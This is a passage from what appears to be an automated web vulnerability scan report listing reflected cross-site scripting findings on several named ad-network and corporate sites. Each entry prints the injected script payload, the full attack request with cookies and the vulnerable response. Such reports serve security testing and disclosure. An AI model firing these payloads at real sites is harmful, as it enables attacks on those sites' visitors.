HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:19:59 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 14:45:17 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 11 Apr 2011 19:58:56 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 860

<iframe id='a22bf83a' name='a22bf83a' src='http://d.w55c.net/afr.php?zoneid=768&amp;cb=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYX
...[SNIP]...
<a href='http://d.w55c.net/ck.php?n=aaa45e90&amp;cb=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw9b88b'><script>alert(1)</script>2e52ce55555' target='_blank'>
...[SNIP]...

6.104. http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RuFuATqDZ_452086828.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5752d'><script>alert(1)</script>f9aa01ebcbc was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RuFuATqDZ_452086828.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=5752d'><script>alert(1)</script>f9aa01ebcbc&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_igAAwGsK5TqKJzYiJ8PEWQEBkOCrFi1HVQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZwU0VZRzVFdQ&ciu=MFJ1RnVBVHFEWg&reqid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjc&ccw=SUFCMSMwLjB8SUFCOCMwLjA&bp=850&zc=NzUyMDc&v=0&s=http%3A%2F%2F& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658381022&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658381041&frm=1&adk=513358139&ga_vid=971996930.1303658381&ga_sid=1303658381&ga_hid=548328206&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=33895132&fu=4&ifi=1&dtd=27
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:20:01 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 14:45:17 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 11 Apr 2011 19:58:56 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 452

<iframe id='a22bf83a' name='a22bf83a' src='http://d.w55c.net/afr.php?zoneid=768&amp;cb=5752d'><script>alert(1)</script>f9aa01ebcbc' frameborder='0' scrolling='no' width='728' height='90'><a href='http
...[SNIP]...

6.105. http://consumerinfo.tt.omtrdc.net/m2/consumerinfo/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://consumerinfo.tt.omtrdc.net
Path:   /m2/consumerinfo/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 5d3dc<script>alert(1)</script>83279623ec6 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/consumerinfo/mbox/standard?mboxHost=www.freecreditscore.com&mboxSession=1303674291453-51326&mboxPage=1303674291453-51326&mboxCount=1&mbox=FCS_LP21_TopSection5d3dc<script>alert(1)</script>83279623ec6&mboxId=0&mboxTime=1303656291456&mboxURL=http%3A%2F%2Fwww.freecreditscore.com%2Fdni%2Fdefault.aspx%3FPageTypeID%3DHomePage21%26SiteVersionID%3D932%26SiteID%3D100323%26sc%3D671212%26bcd%3D&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: consumerinfo.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.freecreditscore.com/dni/default.aspx?PageTypeID=HomePage21&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 214
Date: Sun, 24 Apr 2011 19:57:27 GMT
Server: Test & Target

mboxFactories.get('default').get('FCS_LP21_TopSection5d3dc<script>alert(1)</script>83279623ec6',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303674291453-51326.17");

6.106. http://controlcase.com/contact.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://controlcase.com
Path:   /contact.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c814"%20style%3dx%3aexpression(alert(1))%20136bf77f9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6c814\" style=x:expression(alert(1)) 136bf77f9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /contact.php?subject=Contact%20Control/6c814"%20style%3dx%3aexpression(alert(1))%20136bf77f9aCase HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664491.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.2.10.1303664485

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:14:13 GMT
Server: Apache/2.0.55 (Win32)
Set-Cookie: PHPSESSID=caaa7528c88df0d3e5e633b1f78bd93d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 22252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<input type="hidden" name="subject" value="Contact Control/6c814\" style=x:expression(alert(1)) 136bf77f9aCase" />
...[SNIP]...

6.107. http://controlcase.com/contact.php [subject parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://controlcase.com
Path:   /contact.php

Issue detail

The value of the subject request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89ec3"%20style%3dx%3aexpression(alert(1))%201b20023cb56 was submitted in the subject parameter. This input was echoed as 89ec3\" style=x:expression(alert(1)) 1b20023cb56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /contact.php?subject=Contact%20ControlCase89ec3"%20style%3dx%3aexpression(alert(1))%201b20023cb56 HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664491.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.2.10.1303664485

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:12:28 GMT
Server: Apache/2.0.55 (Win32)
Set-Cookie: PHPSESSID=7ca8ab8a264ea6e518cb96ea41afe741; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 22252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<input type="hidden" name="subject" value="Contact ControlCase89ec3\" style=x:expression(alert(1)) 1b20023cb56" />
...[SNIP]...

6.108. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97760"%3balert(1)//941102d704 was submitted in the $ parameter. This input was echoed as 97760";alert(1)//941102d704 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-405/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=97760"%3balert(1)//941102d704&s=123&z=0.5585765927098691 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=929:97760";alert(1)//941102d704;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "831e6297-8181-4a12afe7ac640"
Vary: Accept-Encoding
X-Varnish: 1634235142 1634232783
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=37
Expires: Sun, 24 Apr 2011 16:00:25 GMT
Date: Sun, 24 Apr 2011 15:59:48 GMT
Connection: close
Content-Length: 2415

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat=',97760";alert(1)//941102d704';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,97760";alert(1)//941102d704;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                   var zzStr = "s=123;u=5ajh4goBADQAAFjiiCYAAABN~042311;z=" + M
...[SNIP]...

6.109. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87518'%3balert(1)//d55194ad270 was submitted in the $ parameter. This input was echoed as 87518';alert(1)//d55194ad270 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-405/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=87518'%3balert(1)//d55194ad270&s=123&z=0.5585765927098691 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=929:87518';alert(1)//d55194ad270;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "831e6297-8181-4a12afe7ac640"
Vary: Accept-Encoding
X-Varnish: 1634235142 1634232783
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=37
Expires: Sun, 24 Apr 2011 16:00:25 GMT
Date: Sun, 24 Apr 2011 15:59:48 GMT
Connection: close
Content-Length: 2420

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat=',87518';alert(1)//d55194ad270';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,87518';alert(1)//d55194ad270;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasA
...[SNIP]...

6.110. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dc62"%3balert(1)//ab56dd9d241 was submitted in the $ parameter. This input was echoed as 9dc62";alert(1)//ab56dd9d241 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-405/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=9dc62"%3balert(1)//ab56dd9d241&s=123&z=0.06824745330959558 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1; FFad=0; FFcat=929,286,14

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=929:9dc62";alert(1)//ab56dd9d241;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "82a0ef50-838c-4a12afe0ff680"
Vary: Accept-Encoding
X-Varnish: 1634234217 1634232398
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=48
Expires: Sun, 24 Apr 2011 16:01:25 GMT
Date: Sun, 24 Apr 2011 16:00:37 GMT
Connection: close
Content-Length: 2441

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat=',9dc62";alert(1)//ab56dd9d241';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,9dc62";alert(1)//ab56dd9d241;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                   var zzStr = "s=123;u=5ajh4goBADQAAFjiiCYAAABN~042311;z=" + M
...[SNIP]...

6.111. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91bdd'%3balert(1)//a4b044a2860 was submitted in the $ parameter. This input was echoed as 91bdd';alert(1)//a4b044a2860 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-405/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=91bdd'%3balert(1)//a4b044a2860&s=123&z=0.06824745330959558 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1; FFad=0; FFcat=929,286,14

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=929:91bdd';alert(1)//a4b044a2860;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "82a0ef50-838c-4a12afe0ff680"
Vary: Accept-Encoding
X-Varnish: 1634234217 1634232398
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=48
Expires: Sun, 24 Apr 2011 16:01:25 GMT
Date: Sun, 24 Apr 2011 16:00:37 GMT
Connection: close
Content-Length: 2441

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat=',91bdd';alert(1)//a4b044a2860';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,91bdd';alert(1)//a4b044a2860;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasA
...[SNIP]...

6.112. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32371"%3balert(1)//535bf6c677 was submitted in the q parameter. This input was echoed as 32371";alert(1)//535bf6c677 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-405/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=32371"%3balert(1)//535bf6c677&$=&s=123&z=0.5585765927098691 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "831e6297-8181-4a12afe7ac640"
Vary: Accept-Encoding
X-Varnish: 1634235142 1634232783
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=38
Expires: Sun, 24 Apr 2011 16:00:25 GMT
Date: Sun, 24 Apr 2011 15:59:47 GMT
Connection: close
Content-Length: 2422

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='32371";alert(1)//535bf6c677';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=32371";alert(1)//535bf6c677;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd=undefined;


                   var zzStr = "s=123;u=5ajh4goBADQAAFjiiCYAAABN~042311;z=" + M
...[SNIP]...

6.113. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ad87'%3balert(1)//84f498407fc was submitted in the q parameter. This input was echoed as 9ad87';alert(1)//84f498407fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-405/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=9ad87'%3balert(1)//84f498407fc&$=&s=123&z=0.06824745330959558 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1; FFad=0; FFcat=929,286,14

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=1;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "82a0ef50-838c-4a12afe0ff680"
Vary: Accept-Encoding
X-Varnish: 1634234217 1634232398
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=48
Expires: Sun, 24 Apr 2011 16:01:25 GMT
Date: Sun, 24 Apr 2011 16:00:37 GMT
Connection: close
Content-Length: 2429

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='9ad87';alert(1)//84f498407fc';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=9ad87';alert(1)//84f498407fc;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasAd
...[SNIP]...

6.114. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d50f2"%3balert(1)//e6acc4c239 was submitted in the q parameter. This input was echoed as d50f2";alert(1)//e6acc4c239 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-405/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=d50f2"%3balert(1)//e6acc4c239&$=&s=123&z=0.06824745330959558 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
